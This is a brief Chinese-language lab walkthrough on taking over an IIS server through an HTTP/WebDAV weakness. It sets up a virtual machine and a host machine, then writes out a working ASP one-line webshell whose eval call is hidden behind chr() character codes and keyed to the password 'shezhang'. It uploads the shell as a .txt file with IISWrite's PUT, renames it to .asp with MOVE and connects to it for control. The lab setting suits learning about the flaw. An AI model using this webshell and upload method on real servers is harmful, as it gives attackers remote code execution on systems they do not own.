利用http漏洞获取权限
环境:一台win3虚拟机
一台物理机
1. 保证物理机和虚拟机在同一网段且能相互ping通
2.在虚拟机上安装iis服务器
3.开放权限
4.在物理机桌面建立一个txt文件,里面内置木马 如:1.txt
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("shezhang"))%>
5.利用iiswirte进行上传和更改格式
put 上传
move 改成asp格式
6.利用工具获取权限,ip为虚拟机地址
成功取得权限